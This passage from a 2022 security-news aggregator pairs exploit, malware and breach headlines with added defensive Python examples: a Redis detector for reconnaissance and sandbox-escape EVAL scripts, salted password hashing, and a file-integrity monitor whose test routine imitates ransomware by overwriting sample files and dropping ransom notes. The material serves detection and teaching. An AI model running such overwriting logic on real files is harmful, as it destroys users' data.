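def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def parse_monitor_line(line: str):
    """Return {'ts', 'ip', 'cmd', 'args'} for one MONITOR line, or None."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    argv = shlex.split(m.group("rest"))   # MONITOR quotes arguments shell-style
    if not argv:
        return None
    return {"ts": float(m.group("ts")), "ip": m.group("ip"),
            "cmd": argv[0].upper(), "args": argv[1:]}


def analyze(monitor_text: str):
    """Flag the Redigo-style sequence: INFO reconnaissance from outside the
    allowed networks, then EVAL scripts carrying sandbox-escape indicators."""
    alerts = []
    recon_from = defaultdict(bool)
    for raw in monitor_text.splitlines():
        ev = parse_monitor_line(raw)
        if ev is None:
            continue
        if ev["cmd"] == "INFO" and is_external(ev["ip"]):
            recon_from[ev["ip"]] = True
            alerts.append((ev["ip"], "recon", "INFO from outside allowed networks"))
        if ev["cmd"] == "EVAL" and ev["args"]:
            script = ev["args"][0]
            hits = [name for name, pat in ESCAPE_PATTERNS.items() if pat.search(script)]
            if hits:
                severity = "critical" if recon_from[ev["ip"]] else "high"
                alerts.append((ev["ip"], severity,
                               "EVAL with sandbox-escape indicators: " + ", ".join(hits)))
    return alerts


if __name__ == "__main__":
    for ip, severity, reason in analyze(SAMPLE_MONITOR):
        print(f"{severity:8s} {ip:15s} {reason}")
```

Run as-is it prints two alerts for the 203.0.113.9 client. In production, feed it `redis-cli MONITOR` output or equivalent command logs, and treat any script that reaches `package` as an exploitation attempt regardless of whether the INFO step was seen; a call that actually succeeds is only possible on an unpatched build, so a hit is also a patch-status finding.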


                Malware Authors "Accidentally" Crash KmsdBot Cryptocurrency Mining Botnet

                exploits
                2022-12-01 https://thehackernews.com/2022/12/researchers-accidentally-crashed.html
                An ongoing analysis into an up-and-coming cryptocurrency mining botnet known as KmsdBot has led to it being accidentally taken down by the threat actors themselves. KmsdBot, as christened by the Akamai Security Intelligence Response Team (SIRT), came to light in mid-November 2022 for its ability to brute-force systems with weak SSH credentials. The botnet strikes both Windows and Linux devices


                CloudWave acquires Sensato to expand its healthcare cybersecurity portfolio

                ciber
                2022-11-30 https://www.helpnetsecurity.com/2022/11/30/cloudwave-sensato/

                CloudWave acquires Sensato Cybersecurity, bringing together cloud hosting services and managed Cybersecurity-as-a-Service for healthcare organizations. Sensato was founded by long-time health information technology visionary John Gomez, who will join CloudWave as chief security and engineering officer. Sensato developed a fully integrated Cybersecurity-as-a-Service platform (CaaS) that features an innovative solution stack to provide real-time network monitoring, intrusion detection, and asset fingerprinting along with a 24×7 Security Operations Center designed specifically for healthcare infrastructure and connected devices. … More

                The post CloudWave acquires Sensato to expand its healthcare cybersecurity portfolio appeared first on Help Net Security.

                Autosummary: “With the addition of the innovative, proprietary technologies included in the Sensato Cybersecurity suite, along with the cyber expertise of the Sensato team, CloudWave will be able to offer customers the high-level cybersecurity we provide for our cloud-based delivery to on-premises systems,” Littlejohn continued.


                IoT device origin matters more than ever

                industry
                2022-11-30 https://www.helpnetsecurity.com/2022/11/30/iot-device-origin/

                Recently, British politicians called on the government to crack down on the use of surveillance equipment from two Chinese companies, Hikvision and Dahua, which are already blacklisted by Washington. Not only did ministers criticize the state-owned companies as national security and cybersecurity threats, but they also brought into question their human rights record. This story is not an outlier. From hard-coded admin passwords to “always-on” cloud features, cheap smart / connected devices with limited privacy … More

                The post IoT device origin matters more than ever appeared first on Help Net Security.

                Autosummary: Recently, British politicians called on the government to crack down on the use of surveillance equipment from two Chinese companies, Hikvision and Dahua, which are already blacklisted by Washington. Powered by smaller, cheaper, and more efficient components, most of this growth comes from Chinese companies. From hard-coded admin passwords to “always-on” cloud features, cheap smart / connected devices with limited privacy or regulatory standards, largely from the Asian superpower, have flooded the market over the past decade.


                How to find hidden data breaches and uncover threats in your supply chain

                financial
                2022-11-30 https://www.helpnetsecurity.com/2022/11/30/how-to-find-hidden-data-breaches-and-uncover-threats-in-your-supply-chain/

                In this article, we’ll help you understand how breaches can stay hidden inside your supply chain, determine if your supplier relationships are increasing your risk, and assess your exposure across your entire supply chain. The cyber pain in the supply chain: a company’s supply chain is like a body’s nervous system, a mesh of interconnected manufacturers, vendors, sub-contractors, service delivery firms, even coding and collaboration tools. The connected enterprise is an efficient enterprise. Provided that the … More

                The post How to find hidden data breaches and uncover threats in your supply chain appeared first on Help Net Security.

                Autosummary: In this article, we’ll help you understand how breaches can stay hidden inside your supply chain, determine if your supplier relationships are increasing your risk, and assess your exposure across your entire supply chain. Why a cybersecurity data breach is not just about your organization: modern business runs on Software-as-a-Service (SaaS), and many of the world’s most successful companies are SaaS vendors, such as Salesforce, Adobe, Shopify, Zoom, or DocuSign. To turn breach information into action, Lab 1 offers Blast, a real-time alerting service; Radius, a detailed breach report; Fallout, an impact assessment with recommended remedies; and company reports for an aggregated, normalised view of risk.


                French Electricity Provider Fined for Storing Users’ Passwords with Weak MD5 Algorithm

                government
                2022-11-30 https://thehackernews.com/2022/11/french-electricity-provider-fined-for.html
                The French data protection watchdog on Tuesday fined electricity provider Électricité de France €600,000 for violating the European Union General Data Protection Regulation (GDPR) requirements. The Commission nationale de l'informatique et des libertés (CNIL) said the electric utility breached European regulation by storing the passwords for over 25,800 accounts by hashing them using the MD5
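The CNIL finding above is about how passwords were stored, not how they were stolen: an unsalted MD5 digest is cheap to reverse by brute force and, because two users with the same password get the same digest, a leaked table also reveals who shares a password. As an added example, not EDF's or CNIL's code, here is the weak scheme next to a hardened one in Python: per-user salt, a deliberately slow PBKDF2-HMAC-SHA256 derivation (chosen because it is in the standard library; Argon2id or bcrypt through a maintained package is the usual first choice), constant-time comparison, and a login path that transparently re-hashes legacy MD5 records. The user names, passwords and the `$pbkdf2-sha256$...` record format are assumptions for the example.

```python
import base64
import hashlib
import hmac
import secrets

PBKDF2_ITERATIONS = 600_000   # OWASP (2023) minimum for PBKDF2-HMAC-SHA256


def md5_store(password: str) -> str:
    """The weak scheme: unsalted and fast. Identical passwords give identical
    digests, and commodity GPUs test billions of MD5 candidates per second."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")


def pbkdf2_store(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, deliberately slow hash in the (assumed) record format
    $pbkdf2-sha256$<iterations>$<salt>$<digest>. A fresh 16-byte salt per
    record means equal passwords no longer produce equal records."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, iterations, dklen=32)
    return f"$pbkdf2-sha256${iterations}${_b64(salt)}${_b64(digest)}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant
    time so a timing side channel cannot leak how many bytes matched."""
    try:
        _, scheme, iterations, salt_b64, digest_b64 = stored.split("$")
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        iterations = int(iterations)
    except (ValueError, TypeError):
        return False
    if scheme != "pbkdf2-sha256":
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, iterations, dklen=len(expected))
    return hmac.compare_digest(actual, expected)


def login_and_upgrade(username: str, password: str, db: dict) -> bool:
    """Authenticate against whichever format the record is in and re-hash legacy
    MD5 records on a successful login, so weak digests disappear over time
    without forcing a password reset on every user."""
    stored = db.get(username)
    if stored is None:
        return False
    if stored.startswith("$pbkdf2-sha256$"):
        return pbkdf2_verify(password, stored)
    # Legacy MD5 record: the only moment the plaintext is available to migrate it.
    if hmac.compare_digest(md5_store(password), stored):
        db[username] = pbkdf2_store(password)
        return True
    return False


if __name__ == "__main__":
    users = {"alice": md5_store("Winter2022!"), "bob": md5_store("Winter2022!")}
    print("MD5 records identical:", users["alice"] == users["bob"])
    print("login ok:", login_and_upgrade("alice", "Winter2022!", users))
    print("alice record now:", users["alice"][:24] + "...")
```

After the first successful login the record for the user is rewritten in the new format; repeat logins then take the slow path only. Keep the iteration count in the record so it can be raised later without invalidating existing hashes.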


                Australia Passes Bill to Fine Companies up to $50 Million for Data Breaches

                financial
                2022-11-30 https://thehackernews.com/2022/11/australia-passes-bill-to-fine-companies.html
                The Australian government has passed a bill that markedly increases the penalty for companies suffering from serious or repeated data breaches. To that end, the maximum fines have been bumped up from the current AU$2.22 million to AU$50 million, 30% of an entity's adjusted turnover in the relevant period, or three times the value of any benefit obtained through the misuse of information,


                Researchers Find a Way Malicious NPM Libraries Can Evade Vulnerability Detection

                exploits
                2022-11-30 https://thehackernews.com/2022/11/researchers-find-way-malicious-npm.html
                New findings from cybersecurity firm JFrog show that malware targeting the npm ecosystem can evade security checks by taking advantage of an "unexpected behavior" in the npm command line interface (CLI) tool. npm CLI's install and audit commands have built-in capabilities to check a package and all of its dependencies for known vulnerabilities, effectively acting as a warning mechanism for


                Cybersecurity researchers take down DDoS botnet by accident

                ciber
                2022-11-30 https://www.bleepingcomputer.com/news/security/cybersecurity-researchers-take-down-ddos-botnet-by-accident/
                While analyzing its capabilities, Akamai researchers have accidentally taken down a cryptomining botnet that was also used for distributed denial-of-service (DDoS) attacks. [...]

                Autosummary: (Figure: KmsdBot botnet crash, Akamai.) "This malformed command likely crashed all the botnet code that was running on infected machines and talking to the C2 — essentially, killing the botnet," Cashdollar added.


                Australia will now fine firms up to AU$50 million for data breaches

                financial
                2022-11-30 https://www.bleepingcomputer.com/news/security/australia-will-now-fine-firms-up-to-au50-million-for-data-breaches/
                The Australian parliament has approved a bill to amend the country's privacy legislation, significantly increasing the maximum penalties to AU$50 million for companies and data controllers who suffered large-scale data breaches. [...]

                Autosummary: The financial penalty introduced by the new bill is set to whichever is greater: AU$50 million; three times the value of any benefit obtained through the misuse of information; or 30% of a company's adjusted turnover in the relevant period. Previously, the penalty for severe data exposures was AU$2.22 million, considered wholly inadequate to incentivize companies to improve their data security mechanisms.


                Google discovers Windows exploit framework used to deploy spyware

                exploits
                2022-11-30 https://www.bleepingcomputer.com/news/security/google-discovers-windows-exploit-framework-used-to-deploy-spyware/
                Google's Threat Analysis Group (TAG) has linked an exploit framework that targets now-patched vulnerabilities in the Chrome and Firefox web browsers and the Microsoft Defender security app to a Spanish software company. [...]

                Autosummary: The exploitation framework consists of multiple components, each of them targeting specific security flaws in software on the targets' devices: Heliconia Noise, a web framework for deploying a Chrome renderer bug exploit followed by a Chrome sandbox escape to install agents on the targeted device; Heliconia Soft, a web framework that deploys a PDF containing the Windows Defender exploit tracked as CVE-2021-42298; and Heliconia Files, a set of Firefox exploits for Linux and Windows, one tracked as CVE-2022-26485. For Heliconia Noise and Heliconia Soft, the exploits would ultimately deploy an agent named "agent_simple" on the compromised device.


                Keralty ransomware attack impacts Colombia"s health care system

                exploits latam ransomware
                2022-11-30 https://www.bleepingcomputer.com/news/security/keralty-ransomware-attack-impacts-colombias-health-care-system/
                The Keralty multinational healthcare organization suffered a RansomHouse ransomware attack on Sunday, disrupting the websites and operations of the company and its subsidiaries. [...]

                Autosummary: Cyberattack disrupts Keralty's operations: over the past few days, Keralty and its subsidiaries, EPS Sanitas and Colsanitas, have suffered disruption to their IT operations, the scheduling of medical appointments, and their websites.


                Critical RCE bugs in Android remote keyboard apps with 2M installs

                exploits
                2022-11-30 https://www.bleepingcomputer.com/news/security/critical-rce-bugs-in-android-remote-keyboard-apps-with-2m-installs/
                Three Android applications that allow users to use devices as remote keyboards for their computers have critical vulnerabilities that could expose key presses and enable remote code execution. [...]

                Autosummary: “Although the vulnerabilities are all related to the authentication, authorization, and transmission implementations, each application’s failure mechanism is different” - Synopsys. The flaws impacting each app are the following: CVE-2022-45477 (9.8 severity rating) –


                New Windows malware scans victims’ mobile phones for data to steal

                exploits
                2022-11-30 https://www.bleepingcomputer.com/news/security/new-windows-malware-scans-victims-mobile-phones-for-data-to-steal/
                Security researchers found a previously unknown backdoor they call Dolphin that's been used by North Korean hackers in highly targeted operations for more than a year to steal files and send them to Google Drive storage. [...]

                Autosummary: Dolphin capabilities: during the initial stage, Dolphin collects the following information from the infected machine: username, computer name, local and external IP address, installed security software, RAM size and usage, presence of debugging or network packet inspection tools, and OS version. The backdoor also sends its current configuration, version number, and time to the C2.


                Google links three exploitation frameworks to Spanish commercial spyware vendor Variston

                exploits
                2022-11-30 https://securityaffairs.co/wordpress/139126/malware/spanish-spyware-vendor-variston.html

                Google’s Threat Analysis Group (TAG) linked three exploitation frameworks to a Spanish surveillance spyware vendor named Variston. While tracking the activities of commercial spyware vendors, Threat Analysis Group (TAG) spotted an exploitation framework likely linked to Variston IT, a Spanish firm. Officially, Variston claims to provide custom security solutions and custom patches for embedded systems. The […]

                The post Google links three exploitation frameworks to Spanish commercial spyware vendor Variston appeared first on Security Affairs.

                Autosummary: Heliconia Noise: a web framework for deploying an exploit for a Chrome renderer bug followed by a sandbox escape. Heliconia Soft: a web framework that deploys a PDF containing a Windows Defender exploit. Heliconia Files: a set of Firefox exploits for Linux and Windows.


                New Windows malware also steals data from victims’ mobile phones

                exploits
                2022-11-30 https://www.bleepingcomputer.com/news/security/new-windows-malware-also-steals-data-from-victims-mobile-phones/
                Security researchers found a previously unknown backdoor they call Dolphin that's been used by North Korean hackers in highly targeted operations for more than a year to steal files and send them to Google Drive storage. [...]

                Autosummary: Dolphin capabilities: during the initial stage, Dolphin collects the following information from the infected machine: username, computer name, local and external IP address, installed security software, RAM size and usage, presence of debugging or network packet inspection tools, and OS version. The backdoor also sends its current configuration, version number, and time to the C2.


                Cybercriminals are cashing in on FIFA World Cup-themed cyberattacks

                ciber
                2022-11-29 https://www.helpnetsecurity.com/2022/11/29/fifa-world-cup-themed-cyberattacks/

                The hype and popularity of the FIFA World Cup has attracted audiences from across the globe. This, in turn, attracts a variety of cybercriminals who want to exploit the varied fan following, and the organizations participating, to make a quick buck. Advanced persistent threat (APT) campaigns, phishing, credit card/cryptocurrency fraud, DDoS attacks, and identity theft are among the threats faced by organizations and audiences, CloudSEK reports. The cybercriminals are motivated by financial gain, ideology, … More

                The post Cybercriminals are cashing in on FIFA World Cup-themed cyberattacks appeared first on Help Net Security.

                Autosummary: “The gap between the supply and demand of FIFA World Cup game tickets, flight tickets, hotels, souvenirs, etc., has been co-opted by cybercriminals, to defraud fans and enthusiasts.” Advanced persistent threat (APT) campaigns, phishing, credit card/cryptocurrency fraud, DDoS attacks, and identity theft are among the threats faced by organizations and audiences, CloudSEK reports.


                The cybersecurity trends organizations will soon be dealing with

                ciber
                2022-11-29 https://www.helpnetsecurity.com/2022/11/29/cybersecurity-trends/

                In this interview with Help Net Security, Brad Jones, VP of Information Security at Seagate Technology, talks about cybersecurity trends organizations will be dealing with soon, particularly concerning cloud misconfiguration, data classification, software vulnerabilities, and the cybersecurity skills gap. Cybersecurity risks are an ever-evolving issue for all organizations. What are the main ones we are going to be dealing with in the near future? There will be a spotlight on cloud misconfiguration. It is already … More

                The post The cybersecurity trends organizations will soon be dealing with appeared first on Help Net Security.

                Autosummary: In this interview with Help Net Security, Brad Jones, VP of Information Security at Seagate Technology, talks about cybersecurity trends organizations will be dealing with soon, particularly concerning cloud misconfiguration, data classification, software vulnerabilities, and the cybersecurity skills gap. As a result, we will see legal departments, security teams, and data owners across other departments work together to classify, manage and protect valuable data. For example, by training security talent to manage automated, cloud-agnostic security tools, companies can better manage security across a multicloud environment.


                CISOs in investment firms help fast-track cybersecurity startups

                ciber
                2022-11-29 https://www.helpnetsecurity.com/2022/11/29/cisos-investment-firms-video/

                In this Help Net Security video, Frank Kim, CISO-in-Residence at YL Ventures, discusses the growing role of CISOs in investment firms and how their role as advisors helps drive cybersecurity startups. Frank works closely with cybersecurity startup founders on ideation, product-market fit, and value realization, on an in-house and regular basis. He provides them with what can be considered an important perspective into the needs of modern CISOs, security teams, and businesses, and he specifically guides … More

                The post CISOs in investment firms help fast-track cybersecurity startups appeared first on Help Net Security.


                CISA Warns of Actively Exploited Critical Oracle Fusion Middleware Vulnerability

                exploits
                2022-11-29 https://thehackernews.com/2022/11/cisa-warns-of-actively-exploited.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical flaw impacting Oracle Fusion Middleware to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation. The vulnerability, tracked as CVE-2021-35587, carries a CVSS score of 9.8 and impacts Oracle Access Manager (OAM) versions 11.1.2.3.0, 12.2.1.3.0, and 12.2.1.4.0.


                Pre-auth RCE in Oracle Fusion Middleware exploited in the wild (CVE-2021-35587)

                exploits
                2022-11-29 https://www.helpnetsecurity.com/2022/11/29/cve-2021-35587-exploited/

                A pre-authentication RCE flaw (CVE-2021-35587) in Oracle Access Manager (OAM) that was fixed in January 2022 is being exploited by attackers in the wild, the Cybersecurity and Infrastructure Security Agency has confirmed by adding the vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog. About CVE-2021-35587: CVE-2021-35587 was discovered by security researchers “Jang” (Nguyen Jang) and “Peterjson” in late 2021 by accident, while “building PoC for another mega-0day.” The vulnerability is in the OpenSSO Agent … More

                The post Pre-auth RCE in Oracle Fusion Middleware exploited in the wild (CVE-2021-35587) appeared first on Help Net Security.


                Tips for Gamifying Your Cybersecurity Awareness Training Program

                ciber
                2022-11-29 https://securityaffairs.co/wordpress/139073/security/gamifying-cybersecurity-awareness-training.html

                In today’s technological world, educating people about cybersecurity awareness is an absolute necessity. According to one report, 82% of data breaches involved the human element, from social attacks to misuse of technologies. These errors are not always entirely preventable, as some level of human error is inevitable, but proper training in cybersecurity awareness can greatly […]

                The post Tips for Gamifying Your Cybersecurity Awareness Training Program appeared first on Security Affairs.

                Autosummary: By leveraging simple concepts of rewards, teamwork, simulations, quizzes, and visual aids, you can give your employees an experience that is more engaging, more entertaining, and more effective than traditional methods. Gamification incentivizes and motivates employees to be more engaged, participate more actively, retain information, and implement behavioral changes moving forward. Visual aids such as graphs, charts, pictures, or videos are a quick and efficient way to convey information that might be harder to understand in text format.


                Ransomware detection with Wazuh SIEM and XDR platform

                exploits
                2022-11-29 https://www.bleepingcomputer.com/news/security/ransomware-detection-with-wazuh-siem-and-xdr-platform/
                Wazuh is a free, open source SIEM/XDR solution with more than 10 million annual downloads. Learn more about how Wazuh can help protect your organization against the ever-evolving tactics of ransomware. [...]

                Autosummary: Ransomware attack vector: ransomware is spread using different techniques, but the most common way computer systems become infected is through user-initiated actions. In recent cyberattacks, ransomware features have expanded to include data exfiltration, distributed denial of service (DDoS) attacks, and anti-analysis techniques. Detection with Wazuh: the initial stage of a ransomware attack involves the malware performing several actions on the infected endpoint; these may include deleting volume shadow copies, disabling the anti-malware service, clearing Windows event logs, creating ransom notes in multiple directories, and changing the desktop background. File integrity monitoring (FIM) is the process of monitoring an endpoint filesystem for addition, deletion, and modification activities. (Figure 1: the Wazuh dashboard showing the result of an SCA check on a Red Hat Enterprise Linux device. Figure 2: Wazuh integration with YARA to detect a ransomware executable.)
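The file integrity monitoring (FIM) capability mentioned above is the part of the ransomware detection story that needs no signature: a baseline of file hashes, a rescan, and a look at what changed. As an added example, not Wazuh's code, the Python below builds a throwaway sample tree, takes a baseline, and then distinguishes a single legitimate edit from the encryption stage (many files turning high-entropy at once, plus the same note appearing in several directories). Directory and file names, the entropy threshold and the alert thresholds are assumptions for the example; the "encryption" is random-byte overwriting, chosen because it has the same entropy profile as ciphertext.

```python
import hashlib
import math
import os
import tempfile
from collections import Counter
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 to 8.0. Text sits around 4 to 5; ciphertext or random
    data is close to 8, which is what documents look like once encrypted."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def snapshot(root: Path) -> dict:
    """FIM baseline: relative path -> SHA-256 for every regular file under root."""
    return {str(p.relative_to(root)): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_snapshots(root: Path, before: dict, after: dict,
                   entropy_threshold: float = 7.0, note_hint: str = "restore") -> dict:
    """Compare two snapshots and extract the ransomware-relevant signals."""
    modified = [f for f in after if f in before and after[f] != before[f]]
    added = [f for f in after if f not in before]
    deleted = [f for f in before if f not in after]
    high_entropy = [f for f in modified + added
                    if shannon_entropy((root / f).read_bytes()) >= entropy_threshold]
    note_dirs = sorted({os.path.dirname(f) for f in added
                        if note_hint in os.path.basename(f).lower()})
    return {"modified": modified, "added": added, "deleted": deleted,
            "high_entropy": high_entropy, "note_dirs": note_dirs}


def is_ransomware_like(report: dict, min_high_entropy: int = 5, min_note_dirs: int = 2) -> bool:
    """A burst of files turning high-entropy, or one note landing in several
    directories, is the pattern worth an alert; a single edited file is not."""
    return (len(report["high_entropy"]) >= min_high_entropy
            or len(report["note_dirs"]) >= min_note_dirs)


def build_sample_tree(root: Path, n_dirs: int = 3, files_per_dir: int = 3) -> None:
    """Constructed sample data: a few small text documents per subdirectory."""
    for d in range(n_dirs):
        sub = root / f"dept{d}"
        sub.mkdir()
        for i in range(files_per_dir):
            (sub / f"doc{i}.txt").write_text(f"Quarterly report {d}-{i}\n" * 40)


def simulate_encryption(root: Path, note_name: str = "HOW_TO_RESTORE.txt") -> None:
    """Stand-in for the ransomware stage: overwrite every document with random
    bytes (same entropy as ciphertext; nothing is really encrypted) and drop a
    note into each directory."""
    for p in list(root.rglob("doc*.txt")):
        p.write_bytes(os.urandom(4096))
    for sub in root.iterdir():
        if sub.is_dir():
            (sub / note_name).write_text("Your files are encrypted. Contact us to restore them.\n")


def run_demo() -> tuple:
    """Return (benign_report, malicious_report) from a temporary sample tree."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        baseline = snapshot(root)
        # Legitimate activity: one document is revised.
        (root / "dept0" / "doc0.txt").write_text("Quarterly report 0-0 (revised)\n" * 40)
        benign = diff_snapshots(root, baseline, snapshot(root))
        # Then the ransomware stage hits the same tree.
        simulate_encryption(root)
        malicious = diff_snapshots(root, baseline, snapshot(root))
        return benign, malicious


if __name__ == "__main__":
    benign, malicious = run_demo()
    print("benign edit flagged:", is_ransomware_like(benign))
    print("encryption flagged:", is_ransomware_like(malicious),
          "| high-entropy files:", len(malicious["high_entropy"]),
          "| note dirs:", malicious["note_dirs"])
```

The entropy test is a heuristic: already-compressed or encrypted files (archives, media, password vaults) legitimately score near 8, so in practice gate it on a burst of changes in a short window rather than on single files, and keep the baseline itself somewhere the endpoint cannot rewrite.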


                EU Council adopts the NIS2 directive

                government
                2022-11-29 https://www.helpnetsecurity.com/2022/11/29/eu-council-adopts-the-nis2-directive/

                The European Council adopted legislation for a high common level of cybersecurity across the Union, to further improve the resilience and incident response capacities of both the public and private sector and the EU as a whole. The new directive, called “NIS2“, will replace the current directive on security of network and information systems (the NIS directive). “There is no doubt that cybersecurity will remain a key challenge for the years to come. The stakes … More

                The post EU Council adopts the NIS2 directive appeared first on Help Net Security.

                Autosummary: Other changes introduced by the new law: the new directive has been aligned with sector-specific legislation, in particular the regulation on digital operational resilience for the financial sector (DORA) and the directive on the resilience of critical entities (CER), to provide legal clarity and ensure coherence between NIS2 and these acts.


                Hackers Using Trending TikTok "Invisible Challenge" to Spread Malware

                exploits
                2022-11-29 https://thehackernews.com/2022/11/hackers-using-trending-invisible.html
                Threat actors are capitalizing on a popular TikTok challenge to trick users into downloading information-stealing malware, according to new research from Checkmarx. The trend, called Invisible Challenge, involves applying a filter known as Invisible Body that just leaves behind a silhouette of the person's body. But the fact that individuals filming such videos could be undressed has led to a

                Autosummary: The stealer code is said to have been embedded in various Python packages such as "tiktok-filter-api," "pyshftuler," "pyiopcs," and "pydesings," with the operators swiftly publishing new replacements to the Python Package Index (PyPI) under different names upon getting removed.


                Spanish police dismantle operation that made €12M via investment scams

                financial
                2022-11-29 https://www.bleepingcomputer.com/news/security/spanish-police-dismantle-operation-that-made-12m-via-investment-scams/
                Spanish National Police have dismantled a cybercrime organization that used fake investment sites to defraud over €12.3 million ($12.8 million) from 300 victims across Europe. [...]


                CISA adds Oracle Fusion Middleware flaw to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-11-29 https://securityaffairs.co/wordpress/139077/security/oracle-fusion-middleware-flaw-known-exploited-vulnerabilities-catalog.html

                CISA added a critical flaw impacting Oracle Fusion Middleware, tracked as CVE-2021-35587, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the critical vulnerability, which impacts Oracle Fusion Middleware and carries a CVSS 3.1 Base Score of 9.8, to its Known Exploited Vulnerabilities Catalog. An unauthenticated attacker with network access via HTTP can exploit […]

                The post CISA adds Oracle Fusion Middleware flaw to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.


                Trigona ransomware spotted in increasing attacks worldwide

                exploits ransomware
                2022-11-29 https://www.bleepingcomputer.com/news/security/trigona-ransomware-spotted-in-increasing-attacks-worldwide/
                A previously unnamed ransomware has rebranded under the name "Trigona," launching a new Tor negotiation site where they accept Monero as ransom payments. [...]

                Autosummary: (Figure: files encrypted by Trigona. Source: BleepingComputer.) The ransomware will also embed the encrypted decryption key, the campaign ID, and the victim ID (company name) in the encrypted files.


                Kurt Sanger joins Batten as Cybersecurity Expert

                ciber
                2022-11-29 https://www.helpnetsecurity.com/2022/11/30/batten-kurt-sanger/

                Batten announced the appointment of Kurt Sanger as a Cybersecurity Expert. As a former Deputy General Counsel with U.S. Cyber Command, Sanger brings years of experience and expertise in cybersecurity and has been involved in the planning of many complex cyber operations. Through this role, Sanger often found himself translating and communicating complex technical information between different communities. Sanger also served 23 years in the United States Marine Corps, giving him a unique perspective on … More

                The post Kurt Sanger joins Batten as Cybersecurity Expert appeared first on Help Net Security.


                How the dynamics of phishing attacks are changing

                financial industry
                2022-11-28 https://www.helpnetsecurity.com/2022/11/28/phishing-attacks-impact-video/

                In this Help Net Security video, Alex Paquette, COO at Ironscales, discusses the impact in terms of the time and energy required to defend against the never-ending and ever-evolving onslaught of phishing attacks. A recent study conducted by Osterman Research found that IT and security teams spend one-third of their time handling phishing threats every week. 70% of organizations spend 16-60 minutes dealing with a single phishing email message. Almost half of the respondents state … More

                The post How the dynamics of phishing attacks are changing appeared first on Help Net Security.


                7 free cybersecurity resources you need to bookmark

                ciber
                2022-11-28 https://www.helpnetsecurity.com/2022/11/28/7-free-cybersecurity-resources-you-need-to-bookmark/

                CodeSec CodeSec is a CLI based tool which brings Contrast’s enterprise-level security testing right to your laptop. It allows you to run real-time SAST or Serverless scans and receive actionable results in a matter of minutes. Defendify Essentials Package Assess your cyber risk, test your network, and improve awareness with essential tools from Defendify: Cybersecurity assessments: Assess your cyber strengths, weaknesses, and opportunities for improvement. Vulnerability scanning: Identify and prioritize vulnerabilities in your organization’s external … More

                The post 7 free cybersecurity resources you need to bookmark appeared first on Help Net Security.

                "

                Autosummary: Defendify Essentials Package Assess your cyber risk, test your network, and improve awareness with essential tools from Defendify: Cybersecurity assessments: Assess your cyber strengths, weaknesses, and opportunities for improvement. "


                Researchers Detail AppSync Cross-Tenant Vulnerability in Amazon Web Services

                exploits
                2022-11-28 https://thehackernews.com/2022/11/researchers-detail-appsync-cross-tenant.html
                Amazon Web Services (AWS) has resolved a cross-tenant vulnerability in its platform that could be weaponized by an attacker to gain unauthorized access to resources. The issue relates to a confused deputy problem, a type of privilege escalation where a program that doesn't have permission to perform an action can coerce a more-privileged entity to perform the action. The shortcoming was reported "

                Autosummary: "


                Over a Dozen New BMC Firmware Flaws Expose OT and IoT Devices to Remote Attacks

                industry
                2022-11-28 https://thehackernews.com/2022/11/over-dozen-new-bmc-firmware-flaws.html
                Over a dozen security flaws have been discovered in baseboard management controller (BMC) firmware from Lanner that could expose operational technology (OT) and internet of things (IoT) networks to remote attacks. BMC refers to a specialized service processor, a system-on-chip (SoC), that's found in server motherboards and is used for remote monitoring and management of a host system, including "

                Autosummary: "


                RansomBoggs Ransomware hit several Ukrainian entities, experts attribute it to Russia

                exploits ransomware
                2022-11-28 https://securityaffairs.co/wordpress/139028/cyber-warfare-2/ransomboggs-ransomware-targeted-ukraine.html

                Several Ukrainian organizations were hit by Russia-based RansomBoggs Ransomware in the last week, ESET reports. Researchers from ESET observed multiple attacks involving a new family of ransomware, tracked as RansomBoggs ransomware, against Ukrainian organizations. The security firm first detected the attacks on November 21 and immediately alerted the CERT US. The ransomware is written in […]

                The post RansomBoggs Ransomware hit several Ukrainian entities, experts attribute it to Russia appeared first on Security Affairs.

                "

                Autosummary: "


                Cyber Monday deal: Get 50% off Malwarebytes Premium, Privacy VPN

                exploits
                2022-11-28 https://www.bleepingcomputer.com/news/security/cyber-monday-deal-get-50-percent-off-malwarebytes-premium-privacy-vpn/
                Malwarebytes' Cyber Monday deal is now live, offering a 50% discount on the Malwarebytes Premium antivirus + Malwarebytes Privacy VPN bundle until November 28th. [...] "

                Autosummary: "


                Experts found a vulnerability in AWS AppSync

                exploits
                2022-11-28 https://securityaffairs.co/wordpress/139045/hacking/amazon-web-services-flaw.html

                Amazon Web Services (AWS) fixed a cross-tenant vulnerability that could have allowed attackers to gain unauthorized access to resources. Amazon Web Services (AWS) has addressed a cross-tenant confused deputy problem in its platform that could have allowed threat actors to gain unauthorized access to resources. The problem was reported to the company by researchers from […]

                The post Experts found a vulnerability in AWS AppSync appeared first on Security Affairs.

                "

                Autosummary: "


                TikTok ‘Invisible Body’ challenge exploited to push malware

                exploits
                2022-11-28 https://www.bleepingcomputer.com/news/security/tiktok-invisible-body-challenge-exploited-to-push-malware/
